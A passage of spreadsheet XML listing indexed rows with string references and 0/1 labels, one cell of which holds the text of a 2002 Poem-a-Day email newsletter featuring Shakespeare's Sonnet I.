      <c r="C6836" s="1" t="s">
        <v>5676</v>
      </c>
      <c r="D6836" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6837">
      <c r="A6837" s="1">
        <v>6835.0</v>
      </c>
      <c r="B6837" s="1" t="s">
        <v>6382</v>
      </c>
      <c r="C6837" s="1" t="s">
        <v>6383</v>
      </c>
      <c r="D6837" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6838">
      <c r="A6838" s="1">
        <v>6836.0</v>
      </c>
      <c r="B6838" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="C6838" s="1" t="s">
        <v>6917</v>
      </c>
      <c r="D6838" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6839">
      <c r="A6839" s="1">
        <v>6837.0</v>
      </c>
      <c r="B6839" s="1" t="s">
        <v>8771</v>
      </c>
      <c r="C6839" s="1" t="s">
        <v>8772</v>
      </c>
      <c r="D6839" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6840" hidden="1">
      <c r="A6840" s="1">
        <v>6838.0</v>
      </c>
      <c r="B6840" s="1" t="s">
        <v>8773</v>
      </c>
      <c r="C6840" s="1" t="s">
        <v>8774</v>
      </c>
      <c r="D6840" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6841">
      <c r="A6841" s="1">
        <v>6839.0</v>
      </c>
      <c r="B6841" s="1" t="s">
        <v>8775</v>
      </c>
      <c r="C6841" s="1" t="s">
        <v>8776</v>
      </c>
      <c r="D6841" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6842" hidden="1">
      <c r="A6842" s="1">
        <v>6840.0</v>
      </c>
      <c r="B6842" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="C6842" s="1" t="s">
        <v>2963</v>
      </c>
      <c r="D6842" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6843">
      <c r="A6843" s="1">
        <v>6841.0</v>
      </c>
      <c r="B6843" s="1" t="s">
        <v>8777</v>
      </c>
      <c r="C6843" s="1" t="s">
        <v>8778</v>
      </c>
      <c r="D6843" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6844" hidden="1">
      <c r="A6844" s="1">
        <v>6842.0</v>
      </c>
      <c r="B6844" s="1" t="s">
        <v>5641</v>
      </c>
      <c r="C6844" s="1" t="s">
        <v>5642</v>
      </c>
      <c r="D6844" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6845">
      <c r="A6845" s="1">
        <v>6843.0</v>
      </c>
      <c r="B6845" s="1" t="s">
        <v>8140</v>
      </c>
      <c r="C6845" s="1" t="s">
        <v>8141</v>
      </c>
      <c r="D6845" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6846" hidden="1">
      <c r="A6846" s="1">
        <v>6844.0</v>
      </c>
      <c r="B6846" s="1" t="s">
        <v>5046</v>
      </c>
      <c r="C6846" s="1" t="s">
        <v>8779</v>
      </c>
      <c r="D6846" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6847">
      <c r="A6847" s="1">
        <v>6845.0</v>
      </c>
      <c r="B6847" s="1" t="s">
        <v>8780</v>
      </c>
      <c r="C6847" s="1" t="s">
        <v>8781</v>
      </c>
      <c r="D6847" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6848" hidden="1">
      <c r="A6848" s="1">
        <v>6846.0</v>
      </c>
      <c r="B6848" s="1" t="s">
        <v>2677</v>
      </c>
      <c r="C6848" s="1" t="s">
        <v>2678</v>
      </c>
      <c r="D6848" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6849" hidden="1">
      <c r="A6849" s="1">
        <v>6847.0</v>
      </c>
      <c r="B6849" s="1" t="s">
        <v>8782</v>
      </c>
      <c r="C6849" s="1" t="s">
        <v>8783</v>
      </c>
      <c r="D6849" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6850" hidden="1">
      <c r="A6850" s="1">
        <v>6848.0</v>
      </c>
      <c r="B6850" s="1" t="s">
        <v>2306</v>
      </c>
      <c r="C6850" s="1" t="s">
        <v>2307</v>
      </c>
      <c r="D6850" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6851" hidden="1">
      <c r="A6851" s="1">
        <v>6849.0</v>
      </c>
      <c r="B6851" s="1" t="s">
        <v>4204</v>
      </c>
      <c r="C6851" s="1" t="s">
        <v>8784</v>
      </c>
      <c r="D6851" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6852" hidden="1">
      <c r="A6852" s="1">
        <v>6850.0</v>
      </c>
      <c r="B6852" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C6852" s="1" t="s">
        <v>1715</v>
      </c>
      <c r="D6852" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6853">
      <c r="A6853" s="1">
        <v>6851.0</v>
      </c>
      <c r="B6853" s="1" t="s">
        <v>3742</v>
      </c>
      <c r="C6853" s="1" t="s">
        <v>3743</v>
      </c>
      <c r="D6853" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6854" hidden="1">
      <c r="A6854" s="1">
        <v>6852.0</v>
      </c>
      <c r="B6854" s="1" t="s">
        <v>8785</v>
      </c>
      <c r="C6854" s="1" t="s">
        <v>8786</v>
      </c>
      <c r="D6854" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6855">
      <c r="A6855" s="1">
        <v>6853.0</v>
      </c>
      <c r="B6855" s="1" t="s">
        <v>8787</v>
      </c>
      <c r="C6855" s="1" t="s">
        <v>8788</v>
      </c>
      <c r="D6855" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6856" hidden="1">
      <c r="A6856" s="1">
        <v>6854.0</v>
      </c>
      <c r="B6856" s="1" t="s">
        <v>3638</v>
      </c>
      <c r="C6856" s="1" t="s">
        <v>8789</v>
      </c>
      <c r="D6856" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6857" hidden="1">
      <c r="A6857" s="1">
        <v>6855.0</v>
      </c>
      <c r="B6857" s="1" t="s">
        <v>8790</v>
      </c>
      <c r="C6857" s="1" t="s">
        <v>8791</v>
      </c>
      <c r="D6857" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6858">
      <c r="A6858" s="1">
        <v>6856.0</v>
      </c>
      <c r="B6858" s="1" t="s">
        <v>6595</v>
      </c>
      <c r="D6858" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6859">
      <c r="A6859" s="1">
        <v>6857.0</v>
      </c>
      <c r="B6859" s="1" t="s">
        <v>8792</v>
      </c>
      <c r="C6859" s="1" t="s">
        <v>8793</v>
      </c>
      <c r="D6859" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6860">
      <c r="A6860" s="1">
        <v>6858.0</v>
      </c>
      <c r="B6860" s="1" t="s">
        <v>8794</v>
      </c>
      <c r="C6860" s="1" t="s">
        <v>8795</v>
      </c>
      <c r="D6860" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6861">
      <c r="A6861" s="1">
        <v>6859.0</v>
      </c>
      <c r="B6861" s="1" t="s">
        <v>8796</v>
      </c>
      <c r="C6861" s="1" t="s">
        <v>8797</v>
      </c>
      <c r="D6861" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6862" hidden="1">
      <c r="A6862" s="1">
        <v>6860.0</v>
      </c>
      <c r="B6862" s="1" t="s">
        <v>8798</v>
      </c>
      <c r="C6862" s="1" t="s">
        <v>8799</v>
      </c>
      <c r="D6862" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6863" hidden="1">
      <c r="A6863" s="1">
        <v>6861.0</v>
      </c>
      <c r="B6863" s="1" t="s">
        <v>7010</v>
      </c>
      <c r="C6863" s="1" t="s">
        <v>7011</v>
      </c>
      <c r="D6863" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6864" hidden="1">
      <c r="A6864" s="1">
        <v>6862.0</v>
      </c>
      <c r="B6864" s="1" t="s">
        <v>8800</v>
      </c>
      <c r="C6864" s="1" t="s">
        <v>8801</v>
      </c>
      <c r="D6864" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6865" hidden="1">
      <c r="A6865" s="1">
        <v>6863.0</v>
      </c>
      <c r="B6865" s="1" t="s">
        <v>4085</v>
      </c>
      <c r="C6865" s="1" t="s">
        <v>4086</v>
      </c>
      <c r="D6865" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6866" hidden="1">
      <c r="A6866" s="1">
        <v>6864.0</v>
      </c>
      <c r="B6866" s="1" t="s">
        <v>8802</v>
      </c>
      <c r="C6866" s="1" t="s">
        <v>8803</v>
      </c>
      <c r="D6866" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6867" hidden="1">
      <c r="A6867" s="1">
        <v>6865.0</v>
      </c>
      <c r="B6867" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C6867" s="1" t="s">
        <v>8804</v>
      </c>
      <c r="D6867" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6868" hidden="1">
      <c r="A6868" s="1">
        <v>6866.0</v>
      </c>
      <c r="B6868" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C6868" s="1" t="s">
        <v>6343</v>
      </c>
      <c r="D6868" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6869" hidden="1">
      <c r="A6869" s="1">
        <v>6867.0</v>
      </c>
      <c r="B6869" s="1" t="s">
        <v>3129</v>
      </c>
      <c r="C6869" s="1" t="s">
        <v>3130</v>
      </c>
      <c r="D6869" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6870">
      <c r="A6870" s="1">
        <v>6868.0</v>
      </c>
      <c r="B6870" s="1" t="s">
        <v>8805</v>
      </c>
      <c r="C6870" s="1" t="s">
        <v>5014</v>
      </c>
      <c r="D6870" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6871" hidden="1">
      <c r="A6871" s="1">
        <v>6869.0</v>
      </c>
      <c r="B6871" s="1" t="s">
        <v>1626</v>
      </c>
      <c r="C6871" s="1" t="s">
        <v>1627</v>
      </c>
      <c r="D6871" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6872">
      <c r="A6872" s="1">
        <v>6870.0</v>
      </c>
      <c r="B6872" s="1" t="s">
        <v>8806</v>
      </c>
      <c r="C6872" s="1" t="s">
        <v>8807</v>
      </c>
      <c r="D6872" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6873" hidden="1">
      <c r="A6873" s="1">
        <v>6871.0</v>
      </c>
      <c r="B6873" s="1" t="s">
        <v>663</v>
      </c>
      <c r="C6873" s="1" t="s">
        <v>664</v>
      </c>
      <c r="D6873" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6874" hidden="1">
      <c r="A6874" s="1">
        <v>6872.0</v>
      </c>
      <c r="B6874" s="1" t="s">
        <v>6319</v>
      </c>
      <c r="C6874" s="1" t="s">
        <v>8808</v>
      </c>
      <c r="D6874" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6875" hidden="1">
      <c r="A6875" s="1">
        <v>6873.0</v>
      </c>
      <c r="B6875" s="1" t="s">
        <v>2977</v>
      </c>
      <c r="C6875" s="1" t="s">
        <v>2978</v>
      </c>
      <c r="D6875" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6876">
      <c r="A6876" s="1">
        <v>6874.0</v>
      </c>
      <c r="B6876" s="1" t="s">
        <v>8809</v>
      </c>
      <c r="C6876" s="1" t="s">
        <v>8810</v>
      </c>
      <c r="D6876" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6877" hidden="1">
      <c r="A6877" s="1">
        <v>6875.0</v>
      </c>
      <c r="B6877" s="1" t="s">
        <v>2647</v>
      </c>
      <c r="C6877" s="1" t="s">
        <v>2648</v>
      </c>
      <c r="D6877" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6878" hidden="1">
      <c r="A6878" s="1">
        <v>6876.0</v>
      </c>
      <c r="B6878" s="1" t="s">
        <v>3163</v>
      </c>
      <c r="C6878" s="1" t="s">
        <v>7517</v>
      </c>
      <c r="D6878" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6879" hidden="1">
      <c r="A6879" s="1">
        <v>6877.0</v>
      </c>
      <c r="B6879" s="1" t="s">
        <v>8811</v>
      </c>
      <c r="C6879" s="1" t="s">
        <v>8812</v>
      </c>
      <c r="D6879" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6880" hidden="1">
      <c r="A6880" s="1">
        <v>6878.0</v>
      </c>
      <c r="B6880" s="1" t="s">
        <v>464</v>
      </c>
      <c r="C6880" s="1" t="s">
        <v>4221</v>
      </c>
      <c r="D6880" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6881">
      <c r="A6881" s="1">
        <v>6879.0</v>
      </c>
      <c r="B6881" s="1" t="s">
        <v>8813</v>
      </c>
      <c r="C6881" s="1" t="s">
        <v>8814</v>
      </c>
      <c r="D6881" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6882" hidden="1">
      <c r="A6882" s="1">
        <v>6880.0</v>
      </c>
      <c r="B6882" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C6882" s="1" t="s">
        <v>7209</v>
      </c>
      <c r="D6882" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6883" hidden="1">
      <c r="A6883" s="1">
        <v>6881.0</v>
      </c>
      <c r="B6883" s="1" t="s">
        <v>5219</v>
      </c>
      <c r="C6883" s="1" t="s">
        <v>8815</v>
      </c>
      <c r="D6883" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6884">
      <c r="A6884" s="1">
        <v>6882.0</v>
      </c>
      <c r="B6884" s="1" t="s">
        <v>6166</v>
      </c>
      <c r="C6884" s="1" t="s">
        <v>6167</v>
      </c>
      <c r="D6884" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6885" hidden="1">
      <c r="A6885" s="1">
        <v>6883.0</v>
      </c>
      <c r="B6885" s="1" t="s">
        <v>8816</v>
      </c>
      <c r="C6885" s="1" t="s">
        <v>8817</v>
      </c>
      <c r="D6885" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6886" hidden="1">
      <c r="A6886" s="1">
        <v>6884.0</v>
      </c>
      <c r="B6886" s="1" t="s">
        <v>3576</v>
      </c>
      <c r="C6886" s="1" t="s">
        <v>8818</v>
      </c>
      <c r="D6886" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6887">
      <c r="A6887" s="1">
        <v>6885.0</v>
      </c>
      <c r="B6887" s="1" t="s">
        <v>6351</v>
      </c>
      <c r="D6887" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6888" hidden="1">
      <c r="A6888" s="1">
        <v>6886.0</v>
      </c>
      <c r="B6888" s="1" t="s">
        <v>678</v>
      </c>
      <c r="C6888" s="1" t="s">
        <v>679</v>
      </c>
      <c r="D6888" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6889" hidden="1">
      <c r="A6889" s="1">
        <v>6887.0</v>
      </c>
      <c r="B6889" s="1" t="s">
        <v>7680</v>
      </c>
      <c r="C6889" s="1" t="s">
        <v>7681</v>
      </c>
      <c r="D6889" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6890" hidden="1">
      <c r="A6890" s="1">
        <v>6888.0</v>
      </c>
      <c r="B6890" s="1" t="s">
        <v>5377</v>
      </c>
      <c r="C6890" s="1" t="s">
        <v>5378</v>
      </c>
      <c r="D6890" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6891" hidden="1">
      <c r="A6891" s="1">
        <v>6889.0</v>
      </c>
      <c r="B6891" s="1" t="s">
        <v>1846</v>
      </c>
      <c r="C6891" s="1" t="s">
        <v>8819</v>
      </c>
      <c r="D6891" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6892" hidden="1">
      <c r="A6892" s="1">
        <v>6890.0</v>
      </c>
      <c r="B6892" s="1" t="s">
        <v>8820</v>
      </c>
      <c r="C6892" s="1" t="s">
        <v>8821</v>
      </c>
      <c r="D6892" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6893" hidden="1">
      <c r="A6893" s="1">
        <v>6891.0</v>
      </c>
      <c r="B6893" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C6893" s="1" t="s">
        <v>5976</v>
      </c>
      <c r="D6893" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6894" hidden="1">
      <c r="A6894" s="1">
        <v>6892.0</v>
      </c>
      <c r="B6894" s="1" t="s">
        <v>8822</v>
      </c>
      <c r="C6894" s="1" t="s">
        <v>8823</v>
      </c>
      <c r="D6894" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6895" hidden="1">
      <c r="A6895" s="1">
        <v>6893.0</v>
      </c>
      <c r="B6895" s="1" t="s">
        <v>2304</v>
      </c>
      <c r="C6895" s="1" t="s">
        <v>8824</v>
      </c>
      <c r="D6895" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6896" hidden="1">
      <c r="A6896" s="1">
        <v>6894.0</v>
      </c>
      <c r="B6896" s="1" t="s">
        <v>4737</v>
      </c>
      <c r="C6896" s="1" t="s">
        <v>4738</v>
      </c>
      <c r="D6896" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6897" hidden="1">
      <c r="A6897" s="1">
        <v>6895.0</v>
      </c>
      <c r="B6897" s="1" t="s">
        <v>3260</v>
      </c>
      <c r="C6897" s="1" t="s">
        <v>3261</v>
      </c>
      <c r="D6897" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6898">
      <c r="A6898" s="1">
        <v>6896.0</v>
      </c>
      <c r="B6898" s="1" t="s">
        <v>8825</v>
      </c>
      <c r="C6898" s="1" t="s">
        <v>8826</v>
      </c>
      <c r="D6898" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6899" hidden="1">
      <c r="A6899" s="1">
        <v>6897.0</v>
      </c>
      <c r="B6899" s="1" t="s">
        <v>3519</v>
      </c>
      <c r="C6899" s="1" t="s">
        <v>3520</v>
      </c>
      <c r="D6899" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6900" hidden="1">
      <c r="A6900" s="1">
        <v>6898.0</v>
      </c>
      <c r="B6900" s="1" t="s">
        <v>8827</v>
      </c>
      <c r="C6900" s="1" t="s">
        <v>8828</v>
      </c>
      <c r="D6900" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6901" hidden="1">
      <c r="A6901" s="1">
        <v>6899.0</v>
      </c>
      <c r="B6901" s="1" t="s">
        <v>6341</v>
      </c>
      <c r="C6901" s="1" t="s">
        <v>8144</v>
      </c>
      <c r="D6901" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6902" hidden="1">
      <c r="A6902" s="1">
        <v>6900.0</v>
      </c>
      <c r="B6902" s="1" t="s">
        <v>8829</v>
      </c>
      <c r="C6902" s="1" t="s">
        <v>8830</v>
      </c>
      <c r="D6902" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6903" hidden="1">
      <c r="A6903" s="1">
        <v>6901.0</v>
      </c>
      <c r="B6903" s="1" t="s">
        <v>5466</v>
      </c>
      <c r="C6903" s="1" t="s">
        <v>5467</v>
      </c>
      <c r="D6903" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6904" hidden="1">
      <c r="A6904" s="1">
        <v>6902.0</v>
      </c>
      <c r="B6904" s="1" t="s">
        <v>1165</v>
      </c>
      <c r="C6904" s="1" t="s">
        <v>8831</v>
      </c>
      <c r="D6904" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6905" hidden="1">
      <c r="A6905" s="1">
        <v>6903.0</v>
      </c>
      <c r="B6905" s="1" t="s">
        <v>4863</v>
      </c>
      <c r="C6905" s="1" t="s">
        <v>7571</v>
      </c>
      <c r="D6905" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6906" hidden="1">
      <c r="A6906" s="1">
        <v>6904.0</v>
      </c>
      <c r="B6906" s="1" t="s">
        <v>2719</v>
      </c>
      <c r="C6906" s="1" t="s">
        <v>8832</v>
      </c>
      <c r="D6906" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6907" hidden="1">
      <c r="A6907" s="1">
        <v>6905.0</v>
      </c>
      <c r="B6907" s="1" t="s">
        <v>8833</v>
      </c>
      <c r="C6907" s="1" t="s">
        <v>8834</v>
      </c>
      <c r="D6907" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6908" hidden="1">
      <c r="A6908" s="1">
        <v>6906.0</v>
      </c>
      <c r="B6908" s="1" t="s">
        <v>8835</v>
      </c>
      <c r="C6908" s="1" t="s">
        <v>8836</v>
      </c>
      <c r="D6908" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6909" hidden="1">
      <c r="A6909" s="1">
        <v>6907.0</v>
      </c>
      <c r="B6909" s="1" t="s">
        <v>8837</v>
      </c>
      <c r="C6909" s="1" t="s">
        <v>8838</v>
      </c>
      <c r="D6909" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6910" hidden="1">
      <c r="A6910" s="1">
        <v>6908.0</v>
      </c>
      <c r="B6910" s="1" t="s">
        <v>8839</v>
      </c>
      <c r="C6910" s="1" t="s">
        <v>8840</v>
      </c>
      <c r="D6910" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6911" hidden="1">
      <c r="A6911" s="1">
        <v>6909.0</v>
      </c>
      <c r="B6911" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C6911" s="1" t="s">
        <v>8841</v>
      </c>
      <c r="D6911" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6912" hidden="1">
      <c r="A6912" s="1">
        <v>6910.0</v>
      </c>
      <c r="B6912" s="1" t="s">
        <v>8842</v>
      </c>
      <c r="C6912" s="1" t="s">
        <v>8843</v>
      </c>
      <c r="D6912" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6913" hidden="1">
      <c r="A6913" s="1">
        <v>6911.0</v>
      </c>
      <c r="B6913" s="1" t="s">
        <v>1486</v>
      </c>
      <c r="C6913" s="1" t="s">
        <v>1487</v>
      </c>
      <c r="D6913" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6914" hidden="1">
      <c r="A6914" s="1">
        <v>6912.0</v>
      </c>
      <c r="B6914" s="1" t="s">
        <v>8661</v>
      </c>
      <c r="C6914" s="1" t="s">
        <v>8662</v>
      </c>
      <c r="D6914" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6915" hidden="1">
      <c r="A6915" s="1">
        <v>6913.0</v>
      </c>
      <c r="B6915" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C6915" s="1" t="s">
        <v>8097</v>
      </c>
      <c r="D6915" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6916" hidden="1">
      <c r="A6916" s="1">
        <v>6914.0</v>
      </c>
      <c r="B6916" s="1" t="s">
        <v>1666</v>
      </c>
      <c r="C6916" s="1" t="s">
        <v>1667</v>
      </c>
      <c r="D6916" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6917" hidden="1">
      <c r="A6917" s="1">
        <v>6915.0</v>
      </c>
      <c r="B6917" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C6917" s="1" t="s">
        <v>11</v>
      </c>
      <c r="D6917" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6918">
      <c r="A6918" s="1">
        <v>6916.0</v>
      </c>
      <c r="B6918" s="1" t="s">
        <v>8844</v>
      </c>
      <c r="C6918" s="1" t="s">
        <v>8845</v>
      </c>
      <c r="D6918" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6919" hidden="1">
      <c r="A6919" s="1">
        <v>6917.0</v>
      </c>
      <c r="B6919" s="1" t="s">
        <v>2477</v>
      </c>
      <c r="C6919" s="1" t="s">
        <v>8846</v>
      </c>
      <c r="D6919" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6920" hidden="1">
      <c r="A6920" s="1">
        <v>6918.0</v>
      </c>
      <c r="B6920" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C6920" s="1" t="s">
        <v>4741</v>
      </c>
      <c r="D6920" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6921" hidden="1">
      <c r="A6921" s="1">
        <v>6919.0</v>
      </c>
      <c r="B6921" s="1" t="s">
        <v>8847</v>
      </c>
      <c r="C6921" s="1" t="s">
        <v>8848</v>
      </c>
      <c r="D6921" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6922">
      <c r="A6922" s="1">
        <v>6920.0</v>
      </c>
      <c r="B6922" s="1" t="s">
        <v>5408</v>
      </c>
      <c r="C6922" s="1" t="s">
        <v>8849</v>
      </c>
      <c r="D6922" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6923" hidden="1">
      <c r="A6923" s="1">
        <v>6921.0</v>
      </c>
      <c r="B6923" s="1" t="s">
        <v>7186</v>
      </c>
      <c r="C6923" s="1" t="s">
        <v>7187</v>
      </c>
      <c r="D6923" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6924" hidden="1">
      <c r="A6924" s="1">
        <v>6922.0</v>
      </c>
      <c r="B6924" s="1" t="s">
        <v>4014</v>
      </c>
      <c r="C6924" s="1" t="s">
        <v>4015</v>
      </c>
      <c r="D6924" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6925" hidden="1">
      <c r="A6925" s="1">
        <v>6923.0</v>
      </c>
      <c r="B6925" s="1" t="s">
        <v>185</v>
      </c>
      <c r="C6925" s="1" t="s">
        <v>186</v>
      </c>
      <c r="D6925" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6926" hidden="1">
      <c r="A6926" s="1">
        <v>6924.0</v>
      </c>
      <c r="B6926" s="1" t="s">
        <v>8850</v>
      </c>
      <c r="C6926" s="3" t="str">
        <f>===========================================================
 Sponsor a child today through Children International.  Give
 a desperately poor child hope for a brighter future.  For
 only $15 a month you can make a difference!
 http://click.topica.com/caaavgIb1dcmWb2yXQNa/ChildrenInternational
 ============================================================
 --------------------------------------------------------------------
                         DayTips.Com Daily Lists
                               Poem-a-Day
 --------------------------------------------------------------------
 info@daytips.com                              http://www.daytips.com
 ....................................................................
                             September 13, 2002
 ....................................................................
 I.
  From fairest creatures we desire increase,
 That thereby beauty's rose might never die,
 But as the riper should by time decease,
 His tender heir might bear his memory:
 But thou, contracted to thine own bright eyes,
 Feed'st thy light'st flame with self-substantial fuel,
 Making a famine where abundance lies,
 Thyself thy foe, to thy sweet self too cruel.
 Thou that art now the world's fresh ornament
 And only herald to the gaudy spring,
 Within thine own bud buriest thy content
 And, tender churl, makest waste in niggarding.
       Pity the world, or else this glutton be,
       To eat the world's due, by the grave and thee.
 --------------------------------------------------------------------
 Shakespeare, William.  Sonnets.
 William Shakespeare (1564-1616) was a famous English poet,
 dramatist, and actor, often regarded as the greatest English
 writer of all time. Shakespeare's early life was spent in
 Stratford-upon-Avon, where little else is known about him
 until he married at age 18 to Anne Hathaway.  He enjoyed
 quick recognition as a skilled playwright in London as a
 member of the Lord Chamberlain's Company (also known as the
 King's Men).  He retired in 1610, having spent a successful
 career as a writer and heralded by royalty and peasants
 alike.
 Shakespeare's privacy resulted in a sketchy timeline of the
 writer's life, leading many over the years to attempt to
 fill in the gaps, often with scraps of fact and fiction that
 only result in nothing close to the truth (A truth we will
 probably never know).  Among the rumors and hypotheses
 offered over the years: that he was gay; a womanizer;
 illiterate (reciting his works to a scribe), and a puppet
 (in which he didn't write the works but was encouraged to
 take credit to shield the real writer -- a person with
 political ties).
 Shakespeare's sonnets give readers a glimpse into the mind
 and heart of the playwright.  Published in 1609, the 154
 sonnets involve the author's relationship with various
 characters, including a striking young man, a mysterious
 woman, and a rival poet.  The identities of the characters
 have also been the subject of much speculation over the
 years, despite the fact that they may have been completely
 created in the mind of the bard.
 --------------------------------------------------------------------
 By Mickie Kennedy of http://www.poetrypreviews.com
 Copyright DayTips.com, Inc., 2002.  All Rights Reserved.
 Copyright by respective poet or publisher; used with permission.
 --------------------------------------------------------------------
 --------------------------------------------------------------------
        \\\\ Recommend DayTips &amp; Enter to Win $10,000  ////
               http://www.daytips.com/recommend.html
 --------------------------------------------------------------------
 To subscribe, send a message to dailypoem-subscribe@topica.com
 To UNsubscribe, follow directions near the bottom:
 ===========================================================
 Save up to 80% on Inkjet Cartridges &amp; get FREE Shipping 
 too! No minimum order required. Satisfaction GUARANTEED. 
 Fast &amp; easy shopping. Prices lower than office supply 
 stores. 
 http://click.topica.com/caaawrcb1dcmWb2yXQNf/77Colors
 ===========================================================
 ==^================================================================
 This email was sent to: mothlight@fastmail.fm
 EASY UNSUBSCRIBE click here: http://topica.com/u/?b1dcmW.b2yXQN
 Or send an email to: dailypoem-unsubscribe@topica.com
 T O P I C A -- Register now to manage your mail!
 http://www.topica.com/partner/tag02/register
 ==^================================================================
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D6926" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6927">
      <c r="A6927" s="1">
        <v>6925.0</v>
      </c>
      <c r="B6927" s="1" t="s">
        <v>8851</v>
      </c>
      <c r="C6927" s="1" t="s">
        <v>8852</v>
      </c>
      <c r="D6927" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="6928" hidden="1">
      <c r="A6928" s="1">
        <v>6926.0</v>
      </c>
      <c r="B6928" s="1" t="s">
        <v>8853</v>
      </c>
      <c r="C6928" s="1" t="s">
        <v>8854</v>
      </c>
      <c r="D6928" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="6929">
      <c r="A6929" s="1">
        <v>6927.0</v>
      </c>
      <c r="B6929" s="1" t="s">
        <v>8216</v>
      </c>
